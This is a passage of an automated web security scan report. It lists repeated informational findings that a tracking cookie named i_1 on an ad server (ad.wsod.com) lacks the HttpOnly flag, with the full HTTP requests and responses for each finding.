
Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/600712?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:41:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2; expires=Fri, 07-Oct-2011 15:41:36 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7161072?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:46:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2; expires=Fri, 07-Oct-2011 15:46:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

   function wsod_tag() {
       document.write('<style type="text/css">\n    a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n    a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

13.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/409603?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:51:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2; expires=Fri, 07-Oct-2011 15:51:53 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 753

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/719556?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2|74:1655:1206:221:0:50994:1315323696:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:57:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2; expires=Fri, 07-Oct-2011 15:57:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 766

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2609121?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2|74:1655:1182:221:0:50995:1315324005:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:02:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2; expires=Fri, 07-Oct-2011 16:02:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/2886387?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2|74:1655:1209:221:0:50996:1315324313:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 16:07:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50999:1315325243:B2|74:1655:1163:221:0:50998:1315324934:B2|74:1655:721:221:0:50997:1315324624:B2; expires=Fri, 07-Oct-2011 16:07:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

   function wsod_image1655() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t
...[SNIP]...

13.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|8:61:46:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2|74:1655:46:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2|8:61:574:7:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:49 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2|74:1655:1163:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328749:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2|74:1655:1209:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/MF-Static_Diversification 120x60.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1206:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


13.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: i_1. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png
